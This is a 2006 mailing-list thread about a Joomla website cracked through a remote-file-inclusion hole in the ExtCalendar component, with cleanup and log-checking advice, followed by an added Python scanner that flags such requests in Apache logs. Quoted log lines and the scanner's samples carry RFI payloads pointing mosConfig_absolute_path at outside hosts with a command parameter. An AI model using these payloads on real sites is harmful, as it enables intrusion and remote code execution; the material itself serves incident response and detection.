PLUG website down

JD Austin jd at twingeckos.com
Tue Jul 18 20:54:03 MST 2006


Just delete the files from the backup (delete them from the site via ftp 
too).
Be sure to look in these directories for signs of it:
components
modules
administrator/components/
administrator/modules
The site may not load right on the front end at first but you can log 
into the administrator side,
uninstall the component and its associated modules, and the front end 
will work again.
It may complain during the uninstall about the files being missing but 
it works out fine.

JD
PS.. mail to you directly bounces - relaying denied
Alan Dayley wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>JD Austin wrote:
>  
>
>>If you're not on version 1.0.10 upgrade now: 
>>http://www.joomla.org/content/view/1510/74/
>>I wouldn't be surprised if they make major changes in Joomla to stomp
>>out this type of thing.
>>
>>In all cases I've had an issue the database was unaffected, only the files.
>>After the initial panic that I might have been rooted I was relieved
>>when I found out how they whacked the index.php and configuration.php
>>files on a few of my inactive sites. 
>>
>>After you restore the site, remove com_extcalendar and com_galeria if
>>they're still installed. 
>>Check the directory structure to make sure they're gone.
>>Also check your temp directory for strangeness.. like a '.a' directory.
>>
>>If you check your logs you'll find stuff like this:
>>
>>    XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
>>    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>>    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>>
>>
>>I regularly check to see what they're trying to circumvent now by
>>grepping for this type of vulnerability in the apache access logs:
>>/bin/grep mosConfig_absolute_path=http
>>/home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack
>>attempts' jd at twingeckos.com
>>The location of your apache logs may be different. If you don't have
>>root you can download the logs for your domain and grep them locally.
>>
>>JD
>>    
>>
>
>Thanks, JD.  Good advice.
>
>I am in contact with Integrum.  The site was, in fact, cracked via the
>ext_calendar component that I thought I had patched.  Integrum caught it
>early this morning and took the site off line to thwart the attack.  We
>are now discussing the means of getting back online without re-instating
>the vulnerability.
>
>It will probably be tomorrow before the site is back online simply
>because Integrum has been handling issues with it since very early this
>morning.  They need to leave it for a while.
>
>I thank them for their efforts and support!
>
>I'll be on the phone with them tomorrow morning.  I'll keep updating
>status here in the list.
>
>Alan
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2 (GNU/Linux)
>Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org
>
>iD8DBQFEvYi9DQw/VSQuFZYRAqpxAJ9vR3s9GGc+yvKCQ6ciMNCUNe1wPACfSHS1
>WcdlshZzjYH2ryyDdlyP6A8=
>=Np1E
>-----END PGP SIGNATURE-----

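As an added, defender-side illustration (not code from the thread, nor from Joomla): a small Python scanner that does what JD's grep does, but parses each combined-format access-log line, URL-decodes the query string so encoded `http%3A%2F%2F` variants of the same request are not missed, and reports the source IP, the included URL and the HTTP status, since a 200 with a sizeable response (like the first line JD quoted) deserves more urgent triage than a 404. The sample log lines are constructed, and every host and IP in them is a placeholder.

```python
"""Scan Apache access-log lines for the remote-file-inclusion pattern the
thread describes: mosConfig_absolute_path pointed at a remote URL.

Added example, not code from the mailing-list post or from Joomla.
The log lines below are constructed samples shaped like the ones quoted
in the thread, with documentation-range IPs and .invalid hostnames.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters abused for RFI in the old Joomla/Mambo components
# named in the thread (compared case-insensitively).
SUSPECT_PARAMS = {"mosconfig_absolute_path"}
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)

# Constructed sample input. Line 3 is benign; line 4 carries the
# "file:" prefix that grep adds when run over several log files.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://198.51.100.7/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
203.0.113.20 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http%3A%2F%2F198.51.100.7%2Fx%2Ftool.txt%3F&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0"
198.51.100.9 - - [18/Jul/2006:10:00:00 -0700] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
www.example.invalid/statistics/logs/access_log:203.0.113.30 - - [18/Jul/2006:11:02:03 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=HTTP://198.51.100.7/x/tool.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    # Drop a leading "path/to/access_log:" left by grep across multiple files.
    line = re.sub(r'^\S*access_log:', '', line)
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi(line):
    """Return a finding dict when a suspect parameter carries a remote URL,
    otherwise None. parse_qsl decodes once; the extra unquote catches
    double-encoded values."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = urlsplit(rec["target"])
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)
        if name.lower() in SUSPECT_PARAMS and REMOTE_SCHEME_RE.match(value):
            status = int(rec["status"])
            return {
                "ip": rec["ip"],
                "time": rec["time"],
                "path": parts.path,
                "param": name,
                "remote_url": value,
                "status": status,
                # A 200 means the script ran; the include may have succeeded.
                "likely_success": status == 200,
            }
    return None


def scan_log(text):
    """Scan a whole log text and return all findings in file order."""
    return [f for f in (find_rfi(l) for l in text.splitlines()) if f]


def summarize(findings):
    """Hit count per source IP, the same view as `cut | sort | uniq -c`."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        flag = "CHECK NOW" if h["likely_success"] else "blocked/404"
        print(f'{h["ip"]} {h["time"]} {h["path"]} -> {h["remote_url"]} [{h["status"]}] {flag}')
    print(summarize(scan_log(SAMPLE_LOG)))
```

Point it at a real file with `scan_log(open(path).read())`; the `likely_success` flag is the triage key, because a 404 shows the component was already removed or never installed, while a 200 with a body means the request reached live PHP and the host needs the file-level checks JD lists above.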